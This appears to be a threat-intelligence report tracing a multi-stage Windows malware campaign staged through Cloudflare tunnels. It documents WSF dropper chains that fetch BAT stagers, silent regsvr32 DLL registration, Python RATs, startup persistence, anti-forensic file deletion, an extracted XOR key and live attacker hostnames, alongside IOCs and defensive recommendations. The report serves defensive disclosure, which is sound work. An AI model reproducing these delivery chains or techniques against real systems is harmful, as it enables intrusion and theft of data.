OPERATION KLEIN CHANGES — Breakglass Intelligence Report

TLP: WHITE Date: 2026-04-03 Analyst: GHOST (Breakglass Intelligence) Classification: Cybercrime — Multi-Stage Malware via Cloudflare Tunnel Network Status: 3 TUNNELS LIVE / 2 TUNNELS DEAD (as of 2026-04-03T18:22Z) Related: Operation Crest Snake (2026-04-03), Operation Nutten Tunnel (2026-04-02)

---

Executive Summary

This investigation documents the klein-changes-slim-starter Cloudflare tunnel, which serves as the WSF dropper hosting node in a multi-tunnel malware delivery network previously identified in Operations Crest Snake and Nutten Tunnel. The tunnel hosts 6 Windows Script Files (WSF) that span the actor's operational history from January 14, 2026 through April 2, 2026, revealing a clear daily evolution in TTPs. The latest payload (UKApr02.wsf, deployed April 2) references a new staging tunnel (chubby-resident-airlines-converter) not previously documented, and shows the actor removing native DLL payloads in favor of a Python-only attack chain — a significant tactical shift within 24 hours. All 6 WSF files, 4 BAT stagers, and associated payloads have zero detections on VirusTotal and no prior reporting on any threat intelligence platform.

This is the same actor as Operations Crest Snake and Nutten Tunnel, confirmed by shared infrastructure (wet-envelope-beam-laser tunnel), identical SID (S-1-5-21-3343087317-1842942590-547433828-500), identical WsgiDAV platform, and consistent targeting patterns.

Key Findings

• 6 WSF droppers spanning 4 months of actor evolution (Jan 14 → Apr 2, 2026)
• NEW tunnel discovered: chubby-resident-airlines-converter[.]trycloudflare[.]com — BAT stager host for April campaigns (LIVE)
• Tactical shift observed: April 1 campaign uses Python RATs + DLL sideloading; April 2 campaign drops the DLL entirely — Python-only
• XOR decryption key extracted: vGTemXQ2PUmLBCzOAPieOYoLGTonlAQ4 (32-byte key for magde.dat shellcode blob)
• Decrypted shellcode: 350,924 bytes with CALL+POP loader (337KB encrypted data blob + 13.5KB PEB-walking loader)
• DLL compiled with GCC 15.1.0 (MinGW-Builds) — unusually current compiler version
• 5 total tunnels referenced in WSF files, mapping the actor's full tunnel rotation history
• ZERO prior detections — all IOCs completely novel

What Was Found vs. What Was Known

Aspect	Prior Reporting (Crest Snake)	New Findings (Klein Changes)
WSF droppers	1 (UKApr02.wsf reference)	6 complete files with full source code
Tunnels mapped	8 tunnels	2 confirmed (triangle-county, peace-ray dead) + chubby-resident NEW
DLL analysis	jopfgl.dll identified, magde.dat noted	XOR key extracted, shellcode decrypted, GCC 15.1.0 compiler identified
Actor evolution	DLL→Python shift noted	Daily evolution documented: DLL+Python (Apr 1) → Python-only (Apr 2)
Historical payloads	Back to Sep 2025	Jan 14, 2026 WSF using triangle-county tunnel (now dead)
DLL naming	jopfgl.dll, pnljjd.dll	emand.dll (Apr 1 stager), 4 DLL names from Mar 26 WSF
Persistence	Startup BAT documented	Two persistence scripts analyzed (1Mar23SU.bat + 1Mar23SU.txt) with 4 execution paths

Attack Chain Evolution — Timeline

January 14, 2026 — 1PhJ14.wsf (Earliest Klein Changes Payload)

1PhJ14.wsf → triangle-county-dangerous-soon.trycloudflare.com (DEAD)
  ├─ Downloads PhA1.txt → PhA1.bat → Executes (Stage 1)
  ├─ Sleeps 90 seconds
  └─ Downloads PhA2.txt → PhA2.bat → Executes (Stage 2)
  Staging dir: %USERPROFILE%\Contacts\

Note: 90-second sleep between stages (later reduced to 10 seconds by Mar 27).

March 25-26, 2026 — TheDll.wsf + UKMar26.wsf (DLL Sideloading Era)

TheDll.wsf + theDll.js → wet-envelope-beam-laser.trycloudflare.com (LIVE)
  ├─ regsvr32 /s pmgime.dll (silent DLL registration)
  └─ start rechung.pdf (German invoice decoy)

UKMar26.wsf → peace-ray-unnecessary-dave.trycloudflare.com (DEAD)
  ├─ regsvr32 /s As/dmmnknAsy.dll     (AsyncRAT?)
  ├─ regsvr32 /s An/pdmemeAna.dll     (AnyDesk?)
  ├─ regsvr32 /s Hv/klnaicHvvv.dll   (HVNC?)
  ├─ regsvr32 /s UK_vio/bgpdpduk-vio.dll (UK-targeted variant?)
  └─ start rechung.pdf (via wet-envelope, decoy)

Critical: 4 DLLs deployed simultaneously, categorized by subdirectories (As, An, Hv, UK_vio).

March 27, 2026 — UKMar27.wsf (Shift to BAT Stagers)

UKMar27.wsf → rover-earlier-baseline-karen.trycloudflare.com (DEAD)
  ├─ UKM301.txt → UKM301.bat → Execute → Wait 10s
  ├─ UKM302.txt → UKM302.bat → Execute → Wait 10s
  └─ UKM303.txt → UKM303.bat → Execute → Wait 10s
  Staging dir: %USERPROFILE%\Contacts\

Shift: Actor moves from direct DLL registration to multi-stage BAT downloaders. Three stages instead of two.

April 1, 2026 — UKA01 via chubby-resident (Python + DLL Hybrid)

UKApr02.wsf (Apr 1 variant) → chubby-resident-airlines-converter (LIVE)
  ├─ UKA011.txt → UKA011.bat (Stage 1: Downloader)
  │   ├─ Downloads 1Mar23MA.zip (16.7MB) → Python 3.12 x64 + 5 obfuscated .py RATs
  │   ├─ Downloads 1Mar23ST.zip (16.7MB) → Backup/stealer Python payload set
  │   ├─ Downloads 1MaDLL.zip (350KB) → jopfgl.dll + magde.dat (Early Bird injection DLL)
  │   └─ Downloads 1Mar23SU.txt → Startup persistence
  │   Source: highland-trend-src-distinct.trycloudflare.com
  │
  └─ UKA012.txt → UKA012.bat (Stage 2: Executor)
      ├─ Launches all .py in Python312x64\ directory
      ├─ regsvr32 /s %APPDATA%\TokenSys\emand.dll  ← NEW DLL NAME
      ├─ Kills Python parents of explorer.exe via WMI
      ├─ Hides directories (attrib +h)
      └─ Deletes all .bat files from Contacts (anti-forensics)

April 2, 2026 — UKA02 via chubby-resident (Python ONLY)

UKApr02.wsf → chubby-resident-airlines-converter (LIVE)
  ├─ UKA021.txt → UKA021.bat (Stage 1: Downloader)
  │   ├─ Downloads 1Mar23MA.zip (16.7MB) → Python 3.12 x64 + 5 obfuscated .py RATs
  │   ├─ Downloads 1Mar23ST.zip (16.7MB) → Backup/stealer Python payload set
  │   ├─ ** NO DLL DOWNLOAD ** ← DLL COMPONENT REMOVED
  │   └─ Downloads 1Mar23SU.txt → Startup persistence
  │
  └─ UKA022.txt → UKA022.bat (Stage 2: Executor)
      ├─ Launches all .py in Python312x64\ directory
      ├─ ** NO DLL REGISTRATION ** ← DLL STEP REMOVED
      ├─ Kills Python parents of explorer.exe via WMI
      ├─ Hides directories (attrib +h)
      └─ Deletes all .bat files from Contacts (anti-forensics)

CRITICAL EVOLUTION: The actor removed the DLL component between April 1 and April 2. This suggests either: (a) the DLL was being detected/flagged, (b) the Python payloads proved sufficient, or (c) the actor is testing which approach has better success rates.

DLL Analysis — jopfgl.dll (from 1MaDLL.zip)

Property	Value
SHA256	3ea83adc47138478ed646170b88581af441f24feeee7f8472868286aadb132fd
Type	PE32+ DLL (x86-64), stripped
Size	16,896 bytes
Compiled	2026-03-30T10:03:18 UTC
Compiler	GCC 15.1.0 (MinGW-Builds, x86_64-posix-seh-rev0)
Exports	DllRegisterServer, DllUnregisterServer, get_payload, inject_early_bird, xor_decrypt
XOR Key	vGTemXQ2PUmLBCzOAPieOYoLGTonlAQ4 (32 bytes, embedded in .rdata)

Decrypted Shellcode (magde.dat XOR decrypted)

Property	Value
SHA256 (encrypted)	f30b89d5fea624867c603d97de819f64e1eb18882d5fda157c877c89f82723e7
SHA256 (decrypted)	22752253be3a10a4598bc8fc0a80810d397a32c0cd27637db92122dc28c95878
Size	350,924 bytes
Structure	CALL +0x525c0 → 337,344-byte encrypted data blob + 13,575-byte PEB-walking loader
Loader Entry	POP RCX; PUSH RBP; MOV RBP, RSP (x64 function prologue)
Pattern	Identical to Nutten Tunnel shellcode architecture (CALL+POP, PEB walk)

Persistence Analysis — Dual Script System

1Mar23SU.txt (Current, Mar 27 2026)

Executes Python payloads from 4 locations on startup:

1. %APPDATA%\Winic\30.3.0rc50\Python312x32\ — 32-bit Python, Mode 2 (kills explorer + nslookup parents)
2. %USERPROFILE%\Contacts\Str\python312x64\ — 64-bit Python, Mode 1 (kills explorer parent only)
3. %USERPROFILE%\Contacts\Str\python312x644\ — 64-bit Python duplicate
4. Uses DiscordDial.vbs WMI helper for parent process termination

1Mar23SU.bat (Original, Dec 15 2025)

Earlier version using PowerShell for process killing instead of VBS/WMI:

1. %USERPROFILE%\Videos\3DAus\python312x32\ — 32-bit Python
2. %USERPROFILE%\Contacts\Str\python312x64\ — 64-bit Python

Evolution: Actor moved from PowerShell-based process termination (detectable by EDR) to VBS+WMI approach (stealthier).

Infrastructure Map — All Tunnels Referenced

#	Tunnel Subdomain	Status	Role	First Seen	Referenced By
1	klein-changes-slim-starter	LIVE	WSF dropper hosting	2026-01-14	Direct investigation target
2	chubby-resident-airlines-converter	LIVE	BAT stager hosting (Apr 1-2)	2026-04-01	UKApr02.wsf, UKMar27.wsf→UKA01
3	wet-envelope-beam-laser	LIVE	DLL + LNK + PDF decoy hosting	2025-03-25	TheDll.wsf, UKMar26.wsf, FSL_DE LNK
4	highland-trend-src-distinct	LIVE	ZIP payload hosting (Python+DLL)	2025-11-28	UKA011.txt, UKA021.txt
5	triangle-county-dangerous-soon	DEAD	Historical BAT stager (Jan 2026)	2026-01-14	1PhJ14.wsf
6	peace-ray-unnecessary-dave	DEAD	Historical DLL host (Mar 2026)	2026-03-26	UKMar26.wsf
7	rover-earlier-baseline-karen	DEAD	Historical BAT stager (Mar 2026)	2026-03-27	UKMar27.wsf
8	crest-ind-snake-dublin	LIVE	Lure WSH hosting	2026-04-02	Crest Snake investigation
9	requires-fortune-nutten-eligible	LIVE	German lure campaign	2026-03-23	Nutten Tunnel investigation

Total mapped tunnels across all 3 investigations: 9

DLL Naming Pattern Analysis

The actor uses distinct DLL names across campaigns, suggesting modular payloads:

DLL Name	Campaign	Suspected Purpose	Tunnel
pnljjd.dll	Mar 25 (German LNK)	Unknown (sideloaded via regsvr32)	wet-envelope
pmgime.dll	Mar 25-26 (TheDll.wsf)	Unknown (sideloaded via regsvr32)	wet-envelope
dmmnknAsy.dll	Mar 26 (UKMar26)	AsyncRAT variant (name contains "Asy")	peace-ray
pdmemeAna.dll	Mar 26 (UKMar26)	AnyDesk RAT (name contains "Ana")	peace-ray
klnaicHvvv.dll	Mar 26 (UKMar26)	HVNC (name contains "Hvvv")	peace-ray
bgpdpduk-vio.dll	Mar 26 (UKMar26)	UK-targeted variant (name contains "uk-vio")	peace-ray
jopfgl.dll	Mar 30 (1MaDLL.zip)	Early Bird APC injection loader	highland-trend
emand.dll	Apr 1 (UKA012.bat)	Unknown (extracted to TokenSys)	highland-trend→local

Actor OPSEC Failures

1. SID embedded in LNK: S-1-5-21-3343087317-1842942590-547433828-500 — Administrator account, consistent across campaigns
2. VPS build environment: Machine name vps-756346 — numbered VPS, likely cloud instance
3. XOR key in plaintext: vGTemXQ2PUmLBCzOAPieOYoLGTonlAQ4 — hardcoded in DLL .rdata section
4. DLL naming reveals payload purpose: Asy=AsyncRAT, Ana=AnyDesk, Hvvv=HVNC, uk-vio=UK variant
5. Date-based WSF naming: UKMar26, UKMar27, UKApr02 — reveals operational calendar
6. Anonymous read-write WebDAV: All tunnels allow unauthenticated writes
7. Evolution artifacts preserved: All 6 WSF files remain on klein-changes tunnel, showing full TTP evolution
8. Compiler version: GCC 15.1.0 — very recent (released 2025), narrows developer profile

MITRE ATT&CK Mapping

Tactic	Technique	ID	Application
Initial Access	Phishing: Spearphishing Link	T1566.002	LNK files disguised as PDFs with Edge icon
Execution	Windows Script Host	T1059.005	WSF/WSH/JS chain execution
Execution	Command and Scripting: Batch	T1059.003	Multi-stage BAT downloaders
Execution	Python	T1059.006	Kramer-obfuscated Python RAT payloads
Execution	Regsvr32	T1218.010	DLL registration via regsvr32 /s
Persistence	Boot/Logon Autostart: Startup Folder	T1547.001	BAT files in Windows Startup
Defense Evasion	Deobfuscate/Decode Files	T1140	XOR decryption of shellcode, Kramer Python obfuscation
Defense Evasion	Hidden Files/Directories	T1564.001	attrib +h on payload directories
Defense Evasion	Process Injection: Early Bird APC	T1055.004	inject_early_bird export in jopfgl.dll
Defense Evasion	Indicator Removal	T1070.004	Deletes all BAT files from Contacts after execution
Defense Evasion	Masquerading	T1036.005	Edge browser icon on LNK, .PDF extension
Command and Control	Web Protocols	T1071.001	WebDAV over HTTPS via Cloudflare tunnels
Command and Control	Proxy: External Proxy	T1090.002	Cloudflare CDN proxying hides origin
Lateral Movement	Lateral Tool Transfer	T1570	WebDAV file copying between tunnels

IOC Summary

Network Indicators

IOC	Type	Status
klein-changes-slim-starter[.]trycloudflare[.]com	Domain	LIVE
chubby-resident-airlines-converter[.]trycloudflare[.]com	Domain	LIVE
wet-envelope-beam-laser[.]trycloudflare[.]com	Domain	LIVE
highland-trend-src-distinct[.]trycloudflare[.]com	Domain	LIVE
triangle-county-dangerous-soon[.]trycloudflare[.]com	Domain	DEAD
peace-ray-unnecessary-dave[.]trycloudflare[.]com	Domain	DEAD
rover-earlier-baseline-karen[.]trycloudflare[.]com	Domain	DEAD

File Indicators

WSF Droppers (from klein-changes tunnel)

SHA256	Filename	Date
13a6420822dab0d4ca6c1b422c66e5dd3a59637588279097efe47f7e553eb849	1PhJ14.wsf	2026-01-14
f38cd6aa26981ba1eea4fb0ec8f9db212e518f65f28556e108ef74d92e4809b6	TheDll.wsf	2026-03-26
bd3a7e2805d2f6f371366d6847998843b98298a748c45dd3ef6014b85697c4ae	UKMar26.wsf	2026-03-27
6b45e1a38609b9b7f2f2508b0b38f700a75ee1ea9b6c548d1a086bd91863efc3	UKMar27.wsf	2026-03-30
79eb3a25e8cd93bda05e3f86897de2d057a776be68a95586eedad6566c79c2c4	UKApr02.wsf	2026-04-02
f2caaf774ab4ac5e7b5d9299117eb1bad22e025a2e530ffc29496456760390b6	theDll.js	2026-03-26

BAT Stagers (from chubby-resident tunnel)

SHA256	Filename	Date
a05ca4e0e257ee5bd584ddd8dfdb3d5c9f6d87dbc46b7afe1c1e6a0ab6467c4e	UKA011.txt	2026-04-01
7fd6934f8fd8ef0e78ae37ab04f31aed8543a8bd2a1dac0b388ce8fe074c3086	UKA012.txt	2026-04-01
53dfef40de6d91c71ff6ae676a609bd1e82a70c6cf9478a89909ee7e258b516e	UKA021.txt	2026-04-02
218628edc95f7c425fad294048adca65e235ae3024f084c9afaf483f66f71b6c	UKA022.txt	2026-04-02

DLL Payloads

SHA256	Filename	Description
3ea83adc47138478ed646170b88581af441f24feeee7f8472868286aadb132fd	jopfgl.dll	Early Bird APC injection DLL (GCC 15.1.0)
f30b89d5fea624867c603d97de819f64e1eb18882d5fda157c877c89f82723e7	magde.dat	XOR-encrypted shellcode (350KB)
22752253be3a10a4598bc8fc0a80810d397a32c0cd27637db92122dc28c95878	magde_decrypted.bin	Decrypted shellcode (CALL+POP loader)
314c2cb202e4cea8d63051325abe326dfb75ae2995e843f6e8eea247290f59a1	1MaDLL.zip	DLL payload archive

LNK Lure

SHA256	Filename	Description
5e112f4229dd70373d9d348fc649a1de971243c610f83e80b95a24910375b28e	FSL_DE_INV_24032026_238969_EML.PDF.lnk	German invoice lure (Edge icon disguise)

Persistence Scripts

SHA256	Filename	Description
766ab64ffd028972b40e7c171525891b1f06a9d381b3f5072de82d77b29f7682	init.cmd	DLL self-registration script

Behavioral Indicators

• Staging directory: %USERPROFILE%\Contacts\ (all campaigns)
• Python install: %USERPROFILE%\Contacts\MainRingtones\python312x64\
• Backup Python: %USERPROFILE%\Contacts\str\python312x64\
• 32-bit Python: %APPDATA%\Winic\30.3.0rc50\Python312x32\
• DLL staging: %APPDATA%\TokenSys\ (Apr 1 only)
• Persistence: Random-named .bat in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
• VBS helper: %USERPROFILE%\Contacts\DiscordDial.vbs (WMI process termination)
• VBS launcher: %USERPROFILE%\Contacts\rhn.vbs / rhnE.vbs (hidden window relaunch)
• Temp directory: %USERPROFILE%\Contacts\docuts\ (ZIP extraction, deleted after)
• XOR Key: vGTemXQ2PUmLBCzOAPieOYoLGTonlAQ4
• SID: S-1-5-21-3343087317-1842942590-547433828-500
• Machine Name: vps-756346

Recommended Actions

Immediate (24-48 hours)

1. Block all 9 trycloudflare tunnel domains at DNS/proxy level
2. Hunt for %USERPROFILE%\Contacts\MainRingtones\ and %USERPROFILE%\Contacts\str\ directories
3. Check Windows Startup folder for unknown .bat files
4. Search for DiscordDial.vbs and rhn.vbs in Contacts folder
5. Monitor regsvr32 execution with WebDAV UNC paths

Short-term (1-2 weeks)

1. Deploy YARA rules for WSF dropper patterns and DLL exports
2. Deploy Suricata rules for WsgiDAV WebDAV traffic patterns
3. Monitor Cloudflare Quick Tunnel DNS for new subdomains by this actor
4. Submit all IOCs to MalwareBazaar, ThreatFox, URLhaus

Medium-term (1-3 months)

1. Monitor highland-trend tunnel for payload updates (refreshed daily)
2. Track actor tunnel rotation patterns (new tunnel every 3-7 days)
3. Watch for GCC 15.1.0 MinGW-built DLLs with similar export patterns

References

• Operation Crest Snake — Breakglass Intelligence, 2026-04-03
• Operation Nutten Tunnel — Breakglass Intelligence, 2026-04-02
• Cloudflare Quick Tunnels abuse: https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/
• WsgiDAV: https://github.com/mar10/wsgidav